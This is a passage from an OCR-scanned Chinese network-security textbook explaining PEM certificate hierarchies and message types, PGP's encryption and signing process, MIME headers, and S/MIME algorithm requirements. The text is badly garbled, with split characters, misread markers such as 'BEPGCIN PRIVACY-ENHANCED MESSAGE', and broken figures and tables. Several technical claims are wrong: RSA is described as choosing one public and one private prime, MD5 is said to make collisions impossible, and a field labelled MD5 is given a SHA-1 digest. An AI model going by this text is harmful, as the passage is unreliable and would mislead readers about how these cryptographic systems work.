本 地 CA 发 “证 明 申请 ”， 填 写 证 件 内 容 并 签名 。 本 地 CA 审查 同意 后 ， 赋 了 予 有 效 期 和 流 
水 编号 ， 同 时 用 CA 的 秘密 密 钥 签名 ， 证 件 即 告 生效 。 

存放 证 件 的 数据 库 ， 其 分 布 式 结构 由 X.500 协议 定义 。 其 他 用 户 可 从 中 取 用 发 送 方 的 
公 钥 以 及 核实 邮件 发 送 证 件 的 有 效 期 。 

为 使 PEM 在 全 球 范围 内 通用 ，RFC 1422 正式 对 CA 层次 结构 作 了 定义 。CA 的 层次 
结构 可 以 看 成 一 棵 倒置 的 树 ， 如 图 6-5 所 示 。RFC1422 规定 Intemet 的 CA 层次 组 织 由 
Internet 政策 注册 管理 机 构 IPRA 牵头 ， 作 为 全 球 的 根 CA， 并 管辖 所 有 下 属 各 大 区 域 ( 洲 、 
国家 、 领 域 、 地 区 等 ) 的 CA 组 织 。IPRA 下 属 的 各 大 区 域 的 CA 组 织 称 为 政策 证 明 管 理 机 
构 即 PCAs(Policy Certification Authorities)， 负 责 下 属 CA 的 注册 工作 。 

CA 分 层 结 构 中 的 任何 人 只 能 有 一 条 认证 路 径 ， 不 允许 交叉 证 书 ， 这 种 方式 能 够 让 人 
们 很 容易 得 到 正确 的 证 书 链 。 

PEM 在 邮件 消息 头 中 包含 相关 证 书 的 机 制 ， 它 定义 了 一 种 CRL 服务 ， 用 户 向 该 服务 
发 送 邮件 消息 来 请 求 CRL。 一 旦 收 到 请 求 ，CRL 服务 就 把 最 新 的 CRL 以 邮件 消息 的 方式 
发 送 给 请 求 者 。 这 种 机 制 保证 了 PEM 在 不 存在 目录 服务 时 ， 也 可 以 使 用 。 
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HACA DACA NACA 
HACA CA CA 


HA CA CA CA 
个 体 HA CA CA 个 体 


个 体 个 体 


图 6-5 PEM CA 分 层 结构 
4. PEM 消息 


PEM 消息 通常 只 是 文本 邮件 消息 的 一 部 分 ， 一 个 邮件 消息 可 以 包含 由 PEM 以 不 同方 
式 处 理 的 多 个 部 分 。 一 部 分 可 能 是 经 过 加 密 的 ， 另 一 部 分 可 能 是 经 过 完整 性 保护 处 理 的 。 
PEM 会 在 不 同 部 分 的 开始 和 结束 位 置 做 上 标记 。 例 如 ， 对 加 密 数据 块 ，PEM 会 在 开始 位 
置 插入 下 面 的 文本 串 : 


一 一 BEPGCIN PRIVACY-ENHANCED MESSAGE 一 一 


在 结束 位 置 插入 下 面 的 文本 串 : 


一 一 PND PRIVACY-ENHANCED MESSAGE 一 一 


PEM 消息 中 包含 的 数据 类 型 有 以 下 几 种 : 

(1) 普通 数据 。 没 有 经 任何 安全 措施 处 理 的 数据 。 

(2) 完整 性 保护 的 未 经 修改 数据 。 在 邮件 消息 中 插入 了 MIC， 但 不 修改 原始 消息 。 
PEM 称 该 类 型 数据 为 MIC-CLEAR。 但 是 ， 数 据 如 果 在 传输 时 被 一 些 邮件 网 关 进行 了 “ 换 
行 符 转 换 ” 之 类 的 处 理 ，MIC 会 失效 。 

(3) 完整 性 保护 的 编码 数据 。PEM 先 对 消息 进行 编码 处 理 ， 确 保 消息 在 穿越 网 关 时 
不 被 修改 ， 然 后 再 插入 MIC， 这 种 消息 称 为 MIC-ONLY。 

(4) 完整 性 保护 、 加 密 的 编码 数据 。PEM 首先 计算 邮件 消息 的 MIC， 然 后 使 用 随机 
选择 的 密 钥 DEK 对 消息 和 MIC 进行 加 密 处 理 。 之 后 把 机 密 的 消息 、 加 密 的 MIC、DEK 
进行 编码 ， 确 保 其 穿越 网 关 时 不 被 修改 。PEM 称 这 种 类 型 的 消息 为 ENCRYPTED。 

PEM 的 应 用 在 很 多 方面 都 存在 安全 问题 。 证 明 机 构 CA 本 身 的 安全 就 很 关键 ，CA 用 
密 钥 对 各 用 户 的 证 件 进行 签发 ， 其 密 钥 的 存储 及 签证 程序 应 该 用 硬件 实现 ， 与 外 部 世界 隔 
离开 。 用 户 密 钥 的 存储 也 是 一 个 不 可 忽视 的 环节 ， 个 人 安全 环境 可 通过 两 种 方式 实现 : 一 
种 是 将 个 人 机 密 信 息 ( 如 加 密 密 钥 )， 存 储 在 一 张 智 能 卡 中 。 使 用 该 卡 与 不 同 平台 上 使 用 
PEM 通信 ; 另 一 种 方式 是 在 硬盘 建 一 子 目 录 ， 用 个 人 识别 号 PIN(Private Identification 
Number) 以 及 一 个 加 密 算法 来 保证 存储 信息 的 安全 。 


6.2.5 PGP 
PGP(Pretty Good Privacy)， 是 一 个 基于 RSA 公 匙 加 密 体 系 的 邮件 加 密 软 件 ， 可 以 用 它 
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对 邮件 保密 以 防止 非 授权 者 阅读 ， 它 还 能 给 邮件 加 上 数字 签名 ， 从 而 使 收 信人 可 以 确认 邮 
件 的 发 送 者 ， 并 能 确信 邮件 没有 被 自 改 。 它 提供 一 种 安全 的 通信 方式 ， 事 先 并 不 需要 任何 
保密 的 渠道 用 来 传递 密 钥 。 它 的 功能 强大 ， 速 度 很 快 ， 而 且 它 的 源 代 码 是 免费 的 。 


1. PGP 服务 


PGP 提供 了 5 种 服务 : 加 密 、 认 证 、 压 缩 、 邮 件 兼容 性 、 分 段 和 组 装 。 

1) ”加 密 

PGP 可 以 用 来 加 密 文件 和 上 邮件， 使 用 它 可 以 安全 地 和 你 从 未 见 过 的 人 通信 ， 事 先 并 不 
需要 任何 保密 的 渠道 用 来 传递 密 钥 。PGP 采用 了 审慎 的 密 钥 管 理 一 一 一 种 RSA 和 传统 加 
密 的 杂 合算 法 ， 用 于 数字 签名 的 邮件 文摘 算法 等 。 发 送 方 生成 一 个 随机 数 作为 一 次 性 会 话 
密 铀 ， 用 此 会 话 密 钥 将 消息 按 CAST-128 或 IDEA 或 3DES 算法 加 密 ; 然后 用 接收 方 公 钥 
按 RSA 算法 加 密会 话 密 钥 ， 并 与 消息 一 起 加 密 。 

2) ”认证 

PGP 还 可 以 只 签名 而 不 加 密 ， 只 提供 认证 服务 ， 这 适用 于 公开 发 表 声明 时 ， 声 明 人 为 
了 证 实 自己 的 身份 ， 可 以 用 自己 的 私 钥 签 名 。 这 样 让 接收 入 就 能 确认 发 信人 的 身份 ， 也 可 
以 防止 发 信人 抵赖 自己 的 声明 和 信件 被 图 中 算 改 。PGP 可 以 利用 SHA-1 算法 计算 消息 的 
散 列 值 ， 并 将 此 消息 摘要 用 发 送 方 的 私 钥 按 DSS 或 RSA 加 密 ， 和 消息 串 接 在 一 起 发 送 。 

3) ”压缩 

作为 一 种 默认 处 理 ，PGP 在 应 用 签名 之 后 、 加 密 之 前 要 对 消息 进行 压缩 ， 以 节省 网 络 
传输 的 时 间 和 存储 空间 ， 使 用 的 压缩 算法 是 ZIP。 压 缩 之 后 再 进行 消息 加 密 可 以 减少 元 余 
信息 ， 增 加 密码 分 析 的 困难 度 。 

压缩 前 生成 签名 可 以 将 消息 和 签名 一 起 存放 ， 为 以 后 的 验证 提供 便利 。 

4) “邮件 兼容 性 

在 PGP 中 ， 经 过 数字 签名 、 压 缩 或 加 密 处 理 后 形成 的 是 任意 二 进 制 位 流 。 然 而 ， 许 
多 电子 邮件 系统 仅仅 允许 使 用 由 ASCII 文本 组 成 的 数据 块 通过 。 因 此 ， 需 要 将 原来 8 位 二 
进 制 流转 化 为 可 打印 的 ASCII 码 字符 。PGP 使 用 Base64 转换 (或 称 ASCII 封装 ) 完 成 此 项 
操作 ， 将 原 数据 的 3 个 8 位 二 进 制 字 节 组 成 一 组 ， 并 将 其 映射 为 4 个 ASCII 码 字 符 ， 同 时 
加 上 CRC 校 验 以 检测 传送 错误 。 接 收 端 在 进行 解密 、 解 压 之 前 ， 需 要 进行 Base64 解码 ， 
把 可 打印 的 ASCII 字符 还 原 成 二 进 制 位 。 

编码 过 程 将 3 个 8 位 组 看 做 4 个 6 位 组 ， 每 一 组 变换 成 Base64 编码 字母 表 中 的 一 个 
字符 。6 位 组 到 字符 映射 如 表 6-4 所 示 。 


表 6-4 Base64 编码 


Q 32 
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Base64 转换 算法 盲目 地 将 输入 串 转 化 为 ASCII 文本 串 ， 转 化 后 的 文本 串 从 字面 上 
看 ， 不 具有 实际 意义 ， 上 下 文 无 关 ， 即 使 在 传输 途中 被 窃听 ， 和 窃听 者 若 想 还 原 其 内 容 ， 也 
是 比较 困难 的 。PGP 也 可 以 选择 只 对 消息 的 签名 部 分 进行 Base64 转换 ， 使 得 接收 方 可 以 
直接 阅读 消息 。 

5) ”分 段 和 组 装 

电子 邮件 工具 通常 限制 消息 的 最 大 长 度 ，PGP 采取 分 段 的 方法 ， 自 动 将 长 消息 分 段 使 
之 可 以 通过 电子 邮件 发 送 。 分 段 在 Base64 编码 后 进行 ， 会 话 密 钥 和 签名 部 分 仅 在 第 一 段 
段 首 出 现 。 接 收 方 收 到 邮件 后 ， 剥 掉 所 有 的 电子 邮件 头 ， 对 分 段 进行 组 装 得 到 原始 邮件 。 


2. PGP 原理 


PGP 使 用 混合 的 加 密 算法 ， 包 含 4 个 密码 单元 对 称 加 密 算法 、 非 对 称 加 密 算法 
RSA、 单 向 散 列 算法 和 随机 数 生 成 器 。PGP 集中 了 这 几 种 加 密 算法 的 优点 ， 使 它们 彼此 
互补 。 

(1) 对 称 加 密 算法 。PGP 使 用 的 加 密 算法 通常 有 3DES、IDEA、CAST-128 等 。IDEA 
输入 和 输出 字 长 为 64 位 ， 密 钥 长 128 位 ，8 轮 迭 代 体制 。 该 算法 是 近年 来 提出 的 一 个 很 
成 功 的 分 组 算法 ， 安 全 、 运 行 速度 快 、 实 现 简 单 。 

电子 邮件 属于 存储 转发 式 服务 ， 使 用 安全 握手 协议 来 协商 双方 拥有 相同 的 会 话 密 钥 是 
不 实际 的 。 因 此 ，PGP 中 的 会 话 密 钥 是 一 次 性 密 铀 ， 即 对 每 一 个 消息 都 要 生成 一 个 128 位 
的 随机 数 作为 新 的 会 话 密 钥 。 因 此 发 送 方 必须 将 此 会 话 密 钥 与 消息 绑 定 在 一 起 ， 随 消息 一 
起 传送 。 为 了 保护 此 会 话 密 钥 ， 发 送 方 使 用 接收 方 的 公 钥 对 其 进行 加 密 处 理 。 

(2) 非 对 称 加 密 算法 RSA。RSA 基于 大 数 不 可 能 质 因数 分 解 这 一 假设 的 公 钥 体系 ， 
找 两 个 很 大 的 质数 ， 一 个 公开 ， 作 为 公 钥 ; 一 个 保密 ， 作 为 私 铀 ， 公 钥 和 私 钥 相互 补充 来 
完成 信息 的 加 密 和 解密 的 过 程 。RSA 即 可 用 于 加 密 ， 也 可 用 于 数字 签名 。PGP 也 可 以 使 
用 ElGamal 代替 RSA 进行 密 钥 加 密 。 
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RSA 安全 性 高 且 易 于 实现 ， 但 计算 量 大 、 运 行 速度 慢 ， 不 适合 加 密 大 量 数据 。 为 了 
减少 加 密 时 间 ，PGP 通常 只 使 用 其 解决 一 次 性 会 话 密 铀 ， 也 就 是 对 称 加 密 算法 密 钥 的 安全 
问题 ， 保 证 只 有 接收 方 能 恢复 绑 定 在 消息 中 的 会 话 密 钥 。 每 个 密 钥 只 加 密 少 量 原文 ， 即 保 
证 了 PGP 的 工作 效率 ， 又 保证 了 其 会 话 密 钥 的 安全 性 ， 从 而 整个 模式 是 安全 的 。 

(3) 单 向 散 列 算法 。PGP 使 用 单 向 散 列 算法 和 对 称 加 密 算法 提供 数字 签名 服务 。PGP 
使 用 的 单 向 散 列 算法 有 MD5 和 SHA。 

MD5 算法 是 Ron Rivest 提出 的 一 个 单 向 散 列 算法 ， 就 是 将 任意 长 的 数字 串 M 映射 成 
一 个 定 长 输出 数字 串 H 的 过 程 。 所 谓 单 向 ， 就 是 任意 两 个 M 不 可 能 具有 相同 的 了 HH。 该 函 
数 曾 经 是 实现 有 效 、 安 全 、 可 靠 数字 签名 和 认证 的 重要 工具 ， 但 目前 已 被 攻破 。SHA-1 会 
从 一 个 最 大 29 位 元 的 讯息 中 产生 一 串 160 位 元 的 摘要 然后 以 MD5 算法 相似 的 原理 为 基 
础 来 加 密 。 

PGP 采用 SHA-1 算法 产生 一 个 160 位 的 二 进 制 数 作为 “消息 摘要 (Message 
DigesD”， 也 叫 邮 件 文摘 。 简 单 地 讲 ， 就 是 对 一 封 邮件 用 某 种 算法 算出 一 个 能 体现 其 “ 精 
华 ” 的 数 来 ， 一 旦 邮件 有 任何 改变 ， 这 个 数 都 会 随 着 变化 。 这 个 数 加 上 作者 的 名 字 ( 在 作 
者 的 密 钥 里 ) 以 及 日 期 等 信息 ， 就 构成 一 个 数字 签名 。 

(4) 随机 数 生 成 器 。PGP 提供 两 个 伪 随 机 数 发 生 器 : 一 个 是 ANSI X9.17 发 生 器 , 采 
用 IDEA 算法 ， 以 64 位 密码 反馈 模式 (CFB) 生 成 ， 另 一 个 是 从 用 户 击 键 的 时 间 和 序列 中 计 
算 焙 值 ， 从 而 引入 随机 性 。 

PGP 保持 一 个 字 节 的 随机 比特 的 256 字 节 缓 冲 区 。 每 次 ，PGP 等 待 一 个 键盘 的 敲 
击 ， 记 下 32 比特 格式 的 从 开始 等 待 到 敲 击 的 时 间 。 接 收 到 键盘 压 下 时 ， 记 下 键盘 敲 击 的 
时 间 和 8 比特 值 。 用 该 时 间 和 击 键 信息 生成 一 个 密 钥 ， 然 后 将 这 个 密 钥 再 用 于 加 密 随 机 比 
特 缓冲 区 的 当前 值 。 

伪 随 机 数 用 一 个 24 字 节 种 子 生 成 一 个 16 字 节 会 话 密 钥 和 一 个 8 字 节 初始 化 向 量 ， 以 
及 一 个 用 来 生成 下 一 个 伪 随 机 数 的 新 种 子 ， 用 于 产生 初始 化 向 量 ， 和 会 话 密 钥 一 起 用 于 
CFB 模式 。 这 个 算法 使 用 对 称 加 密 算法 CAST-128。 

PGP 并 没有 使 用 新 的 概念 ， 它 只 是 将 现 有 的 一 些 算法 综合 在 一 起 。PGP 的 加 密 过 
程 ， 也 就 是 PGP key 的 生成 ， 如 图 6-6 所 示 ， 其 中 符号 “@” 表 示 拼 接 ，PGP key 的 生成 
过 程 中 用 到 了 两 次 拼接 操作 。A 代表 邮件 的 发 送 者 ，B 代表 邮件 的 接收 者 。K m 是 IDEA 
的 加 密 密 钥 ， 一 次 一 密 ，IDEA 表示 使 用 对 称 加 密 算法 (还 可 以 使 用 3DES、CAST-128 等 ) 
对 数据 进行 加 密 处 理 ，ZIP 表示 对 文件 进行 压缩 操作 ，base 64 表示 基数 64 转换 。 

使 用 PGP 协议 发 送 邮件 的 过 程 如 下 : 

(1) 通信 双方 分 别 持 有 各 自 的 私 钥 Da 和 Ds， 同时 持 有 对 方 的 公 钥 Es 和 EA。 

(2) 发 送 方 A 使 用 SHA( 或 MD5) 对 明文 邮件 P 进行 加 密 计 算 ， 获 得 160 位 (或 128 位 ) 
固定 长 度 的 邮件 文摘 ， 然 后 使 用 A 自己 的 RSA 私 钥 DA 对 邮件 摘要 签名 加 密 得 到 H。 

(3) 互 与 明文 邮件 P 拼接 为 P1。 

(4) Pl 经 过 压缩 得 到 压缩 文件 P1.Z。 

(5) 对 P1.Z 进 行 IDEA 加 密 运算 ， 其 密 钥 为 Kmw， 加 密 后 得 到 P2。 

(6) 使 用 B 的 RSA 公 钥 Es 对 Km 加 密 得 到 Klm。 

(7) P2 与 Kl 拼接 后 ， 再 使 用 base64 编码 ， 得 到 一 个 ASCII 码 文本 ， 即 PGP 加 密 
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后 的 邮件 ， 此 时 可 对 外 发 送 。 


B 的 RSA 
公开 密 钥 Es 


A 的 RSA 


密 密 铁 
A 的 2 
明文 P H P1 Pl .2 - 
" per] yo ye 
[a 


压缩 后 的 P1 


P 与 H 拼接 用 密 乌 Kw 加 密 后 的 PI.Z 与 
用 窗 钥 Es 加 密 后 的 Kv 拼接 


6-6 ”PGP key 的 生成 


接收 方 B 收 到 PGP 加 密 的 邮件 后 ， 要 对 其 进行 解密 ， 解 密 的 过 程 如 下 : 

(1) 首先 ，B 对 邮件 进行 base64 解码 ; 

(2) 然后 用 自己 RSA 的 私 钥 De 解 算出 IDEA 算法 的 密 钥 Km; 

(3) 用 Kw 恢 复出 P1.Z， 然 后 解压 缩 还 原 出 P1; 

(4) 接着 ，B 分 开明 文 P 和 加 了 密 的 邮件 文摘 ， 然 后 用 A 的 公 钥 EA 对 邮件 文摘 进行 
解密 ; 

(5) B 同时 对 明文 P 进行 MD5 或 SHA 加 密 运 算 ， 并 把 运算 的 结果 和 第 (4) 步 的 结果 
进行 比较 ， 如 果 相 同 ， 则 证 明 邮 件 在 传送 过 程 中 没有 改变 ， 邮 件 是 安全 完整 的 ， 否 则 ， 拒 
绝 此 邮件 。 


3. PGP 消息 


PGP 消息 由 3 个 部 分 组 成 : 报 文部 分 、 签 字 部 分 和 会 话 密 钥 。 如 图 6-7 所 示 。 签 字 部 
分 和 报 文部 分 要 经 过 压缩 和 加 密 ， 然 后 ， 对 整个 PGP 消息 进行 基于 64 编码 方式 编码 。 

会 话 密 钥 部 分 包括 会 话 密 钥 和 发 送 方 加 密会 话 密 钥 时 所 用 的 接收 方 公 钥 的 标识 ， 属 于 
可 选项 。 

签字 部 分 用 来 表示 发 送 者 的 身份 ， 属 于 可 选项 。 除 签字 首部 外 还 包括 如 下 内 容 : 

(1) 时 间 惟 : 签名 创建 时 的 时 间 。 

(2) EA 的 标识 符 : 即 发 送 方 A 的 公 钥 ， 用 于 标识 接收 方 B 解密 时 使 用 的 公 钥 ， 在 传 
送 之 前 要 经 过 压缩 和 加 密 操作 。 

(3) 类 型 : 消息 摘要 的 头 两 个 8 位 字 节 ， 接 收 方 通过 比较 原文 中 的 头 两 个 字 节 和 解密 
后 摘要 中 的 头 两 个 字 节 ， 来 判断 是 否 使 用 了 正确 的 公 钥 解密 消息 摘要 。 这 两 个 字 节 作为 消 
息 的 16 位 校 验 序列 。 

(4) MD5 散 列 函数 : 160 比特 的 SHA-1 消息 摘要 ， 用 发 送 方 的 私 钥 加 密 。 摘 要 包含 
时 间 戳 可 以 防止 重 发 攻击 。 不 包括 报 文部 分 的 文件 名 和 时 间 戳 保证 了 分 离 后 的 签名 与 分 离 
前 的 签名 一 致 。 

报 文部 分 是 将 要 存储 或 传输 的 数据 ， 包 括 报 文 首 部 、 文 件 名 、 报 文 产生 的 时 间 戳 以 及 
报 文正 文 。 


200 网 络 安全 与 管理 


Base64 编码 的 PGP 报 文 
IDEA 如 密 ， 压 缩 
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6.2.6 S/MIME 


S/MIME(Secure/Multipurpose Internet Mail Extension) 是 在 MIME 的 基础 上 增加 和 安全 
传输 邮件 相关 的 内 容 类 型 后 的 邮件 格式 ， 增 加 的 内 容 类 型 主要 为 了 表示 用 于 认证 邮件 内 容 
的 数字 签名 和 加 密 邮 件 内 容 产 生 的 密 文 。 

S/MIME 采用 的 加 密 算法 和 认证 算法 与 PGP 使 用 的 类 似 ， 如 用 RSA 或 DSS 作为 数字 
签名 算法 ， 用 三 重 DES 作为 加 密 算法 ， 用 SHA-1 或 MD5 作为 报 文摘 要 算法 。 但 SIMIME 
侧重 于 作为 商业 和 团体 使 用 的 工业 标准 ， 而 PGP 则 倾向 于 为 用 于 提供 个 人 电子 邮件 的 安 
全 性 。 


1. MIME 简介 


传统 的 SMTP 协议 只 能 传输 7 位 的 ASCII 码 文 本 文件 ， 不 能 传输 可 执行 文件 或 其 他 
二 进 制 对 象 。 为 了 实现 非 文 本 邮件 的 传输 ， 系 统 必须 先 对 邮件 进行 格式 转化 。SMTP 对 于 
8 位 及 以 上 字符 的 传输 也 存在 问题 ， 因 此 不 能 传递 包括 国际 语言 字符 的 文本 数据 。 另 外 ， 
SMTP 服务 器 对 接收 的 邮件 消息 的 大 小 也 有 一 定 的 限制 。 

MIME 是 对 SMTP 的 一 个 扩展 ， 解 决 了 使 用 SMTP 协议 存在 的 一 些 问题 和 限制 。 
MIME 定义 了 以 下 几 个 要 素 : 

(1) 定义 了 5 个 新 的 报头 域 ， 这 些 域 提供 有 关 正文 的 信息 。 

(2) 定义 了 多 种 邮件 内 容 格 式 ， 对 多 媒体 电子 邮件 的 表示 方法 进行 了 标准 化 。 

(3) 定义 了 传送 编码 ， 可 以 对 任何 内 容 的 邮件 格式 进行 转换 ， 保 证 能 够 被 SMTP 邮件 
系统 正常 传输 。 

实际 上 MIME 就 是 在 邮件 传送 到 互联 网 之 前 ， 和 从 互联 网 接收 之 后 到 达 用 户 之 前 进 
行 邮件 格式 的 转换 。MIME 的 邮件 格式 如 下 所 示 : 


SMTP 首部 
MIME 首部 
MIME-Version: 
Content-TYpe: 
Content-ID: 
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Content-Transfer-Encoding: 
Content-Description: 


邮件 体 

MIME 在 SMTP 首部 的 基础 上 增加 了 5 个 首部 字段 ， 分 别 是 : 

@ ”MIME-Version: 版 本 号 ， 目 前 为 1.0， 表 明 该 消息 符合 RFC2045 和 RFC2046。 

@ ”Content-Type: 内 同类 型 ， 描 述 正文 包含 的 数据 类 型 ， 接 收 方 可 以 根据 该 字段 选 
择 合适 的 代理 或 机 制 正确 处 理 数据 。 
Content-ID: 内 容 标识 ， 在 多 重 上 下 文中 唯一 标识 MIME 实体 的 标识 。 
Content-Transfer-Encoding: 内 容 转 换 编 码 ， 说 明 邮 件 正文 转换 的 编码 方式 。 
Content-Description: 内 容 描述 、 正 文 对 象 的 文本 描述 ， 在 该 对 象 不 可 读 时 使 
用 ， 如 音频 数据 。 

MIME 邮件 体 不 仅 支持 标识 ASCII 码 ， 还 支持 任意 的 二 进 制 位 信息 ， 包 括 图 像 、 音 频 

和 动画 等 。MIME 支持 的 内 容 类 型 如 表 6-5 所 示 。 


表 6-5 MIME 支持 的 内 容 类 型 
类 型 描 述 
[pan | 无 格式 文本 ， 为 ASCII 码 或 ISO8859 码 


提供 格式 灵活 的 文档 信息 


邮件 由 多 个 报 文 组 成 ， 它 们 相互 独立 但 一 起 传输 ， 按 顺序 提供 
ee 给 收 件 人 


Maultipart 和 Mixed 基本 相同 ， 但 传送 时 ， 各 子 报 文 无 顺序 
不 同 子 报 文 是 同一 信息 的 不 同 版 本 ， 接 收 方 按 最 佳 方式 显示 
| Digest | 与 Mixed 类 似 ， 但 每 部 分 默认 的 类 型/ 子 类 型 为 message/rfc822 
封装 消息 的 正文 与 fe822 一 到 
Nisei 传输 一 个 超大 邮件 ， 以 对 收 件 人 透明 的 方式 分 割 邮件 
包含 一 个 指向 存储 在 其 他 地 方 的 对 象 指针 
ee | jpe。 | jEIF 编码 的 JPEG 格式 图 像 
图 像 为 GIF 格式 
Video mpeg MPEG 格式 动画 
Audio Basic 单 通 道 8 位 ISDN，8kHz 编码 
PostScript Adobe Postscript 
octet-stream 不 间断 字 节 流 ， 一 般 的 8 位 二 进 制 数 据 


类 型 为 多 部 分 类 型 (Multipart) 时 ， 表 示 邮 件 体 由 多 个 相互 独立 的 部 分 组 成 。 此 时 ， 
Content-Type 中 包含 一 个 “分 界 符 ” 参 数 ， 用 来 定义 邮件 体 中 各 部 分 的 分 隔 符 。 分 界 符 必 
须 从 一 个 新 行 开始 ， 并 在 两 个 连 字 符 后 “一 一 ” 跟 分 界 符 值 ， 最 后 一 个 分 界 符 表示 最 后 一 
个 部 分 的 结尾 ， 并 有 两 个 连 字符 做 后 级。 

以 下 是 一 个 多 正文 消息 的 简单 例子 : 


Data: Sat, 10 Mar 2012, 9:12:12 


Application 


202 


据 。 
两 个 
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From: nic@sohu.com 
Subject: 我 美丽 的 家 乡 
To: momo@126.com 
MIME-Version: 1.0 
Content-Type: multipart/mixed; boundary= “my boundary” 
一 一 my boundary 
老师 : 
您 好 ! 
我 的 家 在 美丽 的 滨海 之 城 ， 欢 迎 您 来 做 客 ， 随 信 附 上 我 拍摄 的 几 幅 照片 。 
一 my boundary 
Content-Type: image/gif 
Content-Transfer-Encoding: base64 
(照片 数据 ) 


一 my boundary- 一 

以 上 的 MIME 邮件 体 由 两 部 分 组 成 : 一 部 分 只 包含 字符 信息 ， 一 部 分 包含 图 像 数 
参数 “boundary” 指 定 了 各 部 分 的 分 界 符 为 “my boundary”。 最 后 一 个 分 界 符 后 紧 跟 
连 字符 ， 表 明 整 个 multipart 结束 。 

MIME 的 另外 一 个 重要 功能 是 进行 编码 转换 ， 它 定义 了 两 种 编码 方式 ， 但 Content- 


Transfer-Encoding 字段 可 以 取 6 个 值 如 表 6-6 所 示 。 


表 6-6 MIME 转换 编码 


编 码 说 明 
7 位 所 有 数据 都 用 短 行 (每 行 不 超过 1000 字符 ) 的 ASCII 码 字符 表示 
8 位 短 行 表示 ， 但 可 以 有 非 ASCII 码 字 符 
bina 人 允许 包含 非 标准 ASCII 字符 ， 且 可 存在 长 行 
quoted-printable 既 实现 用 ASCII 字符 表示 数据 ， 又 尽 可 能 保持 原来 的 可 读 性 
Base64 用 64 个 8 位 二 进 制 表示 的 可 打印 ASCI 字符 
x-token 非 标准 编码 的 名 称 ， 可 以 是 销售 商定 义 的 或 应 用 程序 自 定义 的 方式 


信息 
安全 


当 取 值 为 7 位 、8 位 和 binary 时 ， 系 统 不 进行 编码 ， 而 是 提供 一 些 与 数据 属性 相关 的 
。quoted-printable 转换 编码 在 数据 由 大 量 可 打印 的 ASCII 字符 组 成 时 使 用 ， 是 一 种 不 
的 十 六 进 制 字符 表示 方法 ， 并 引入 软 回 车 来 解决 每 行 不 得 超过 76 个 字符 的 限制 。 


2. S/MIME 功能 
S/MIME 是 从 PEM 和 MIME 发 展 来 的 ， 它 增加 了 与 安全 传输 邮件 有 关 的 内 容 ， 


S/MIME 提供 的 功能 有 : 


(1) 封装 数据 。 由 加 密 内 容 和 加 密 该 内 容 的 所 有 加 密 密 钥 组 成 ， 密 钥 可 以 是 与 一 个 或 


多 个 接收 方 对 应 的 多 个 密 钥 。 


后 ， 


转换 
能 看 


(2) 签名 数据 。 提 取 邮 件 的 消息 摘要 ， 并 用 发 送 方 的 私 钥 进 行 加 密 得 到 数字 签名 ， 之 
用 base64 对 邮件 和 签名 进行 编码 。 

(3) 透明 签名 数据 。 对 多 部 分 内 容 类 型 的 子 类 型 签名 时 使 用 。 签 名 过 程 不 对 签名 消息 
， 消 息 以 明文 发 送 。 这 样 ， 即 使 接收 方 没有 S/MIME 能 力 ， 不 能 对 签名 进行 验证 ， 也 
到 消息 的 内 容 。 
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(4) 签名 并 封装 数据 。 仅 签名 实体 和 仅 封装 实体 可 以 嵌 套 ， 能 对 加 密 后 的 数据 进行 签 
名 和 对 签名 数据 或 透明 签名 数据 进行 加 密 。 
S/MIME 使 用 的 加 密 算法 和 PGP 类 似 ， 如 表 6-7 所 示 。 


表 6-7 S/MIME 使 用 的 加 密 算法 


功 能 要 求 
必须 支持 SHA-1 
消息 

人 接收 方 应 该 支持 MD5， 以 便 向 后 兼容 
发 送 代 理 和 接收 代理 必须 支持 DSS 
发 送 代 理应 该 支持 RSA 加 密 

消息 l 

二 接收 代理 应 该 支持 验证 密 钥 大 小 在 512 一 1024 比特 之 间 的 RSA 
签名 
发 送 代 理 和 接收 代理 应 该 支持 Diffie-Hellman 

发 送 消息 加 密会 话 密 钥 发 送 代 理 和 接收 代理 必须 支持 密 钥 大 小 在 512 一 1024 比特 之 间 


的 RSA 加 密 

发 送 代 理 和 接收 代理 必须 支持 3DES 加 密 
发 送 代 理应 该 支持 AES 

发 送 代理 应 该 支持 RC2/40 加 密 

接收 代理 必须 支持 SHA-1 的 HMAC 
接收 代理 应 该 支持 SHA-1 的 HMAC 


用 一 次 性 会 话 密 钥 加 密 消息 


创建 消息 认证 码 


表 中 术语 “必须 ”的 意思 是 一 定 要 满足 的 要 求 。 实 现时 ， 必 须 包括 其 特性 或 与 规范 中 
的 功能 一 致 。 术 语 “ 应 该 ”的 意思 是 通常 要 满足 的 要 求 ， 除 非 在 特定 条 件 下 有 合理 的 理 
由 ， 可 以 忽略 其 特性 或 功能 ， 但 建议 实现 包含 其 特性 或 功能 。 

S/MIME 使 用 混合 加 密 算法 ， 它 推荐 的 数字 签名 算法 是 DSS，Diffie-Hellman 是 
S/MIME 推荐 的 密 钥 交换 算法 ， 在 实际 应 用 中 ，S/MIME 多 使 用 Diffie-Hellman 的 变 体 
ElGamal 实现 加 密 和 解密 。RSA 既 可 以 用 做 签名 ， 也 可 以 对 会 话 密 钥 进行 加 密 ， 类 似 于 
PGP 中 的 应 用 。 对 于 创建 数字 签名 的 散 列 函 数 ，S/MIME 推荐 使 用 160 比特 的 SHA-1， 但 
对 于 接收 方 ， 要 求 能 够 支持 128 比特 的 MD5 算法 ， 以 保持 对 旧版 本 S/MIME 的 兼容 性 。 

对 于 消息 的 加 密 ， 推 荐 使 用 3DES， 但 实现 时 也 应 该 支持 40 比特 的 RC2，RC2 是 一 
种 弱 加 密 算法 ， 得 到 了 美国 官方 的 出 口 许可 。 

S/MIME 规范 包括 了 如 何 决定 采用 哪 种 加 密 算法 ， 在 进行 邮件 传输 之 前 ， 发 送 方 代理 
必须 要 确定 两 件 事 : 

@ ”接收 方 代理 是 否 能 够 解密 发 送 方 将 要 使 用 的 加 密 算法 ; 

@ ”如 果 接 收 方 代理 只 能 接收 弱 加 密 的 内 容 ， 自 己 是 否 接受 弱 加 密 的 方式 。 

为 了 达到 以 上 要 求 ， 发 送 方 代理 可 以 在 发 送 消息 之 前 先 宣布 它 的 解密 能 力 ， 由 接收 方 
代理 将 该 消息 存储 起 来 ， 留 给 将 来 给 对 方 发 送 消息 时 使 用 。 

发 送 代理 应 该 遵从 如 下 规则 : 

(1) ”如果 发 送 代理 已 经 拥有 一 张 接收 方 的 解密 能 力 表 ， 应 该 选择 表 中 的 第 一 种 能 力 ， 
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即 优先 级 最 高 的 。 

(2) 如 果 发 送 方 代理 没有 接收 方 的 解密 能 力 表 ， 但 曾经 接收 到 一 个 或 多 个 消息 ， 则 应 
使 用 与 接收 到 的 最 后 一 个 签名 和 加 密 消息 相同 的 加 密 算法 。 

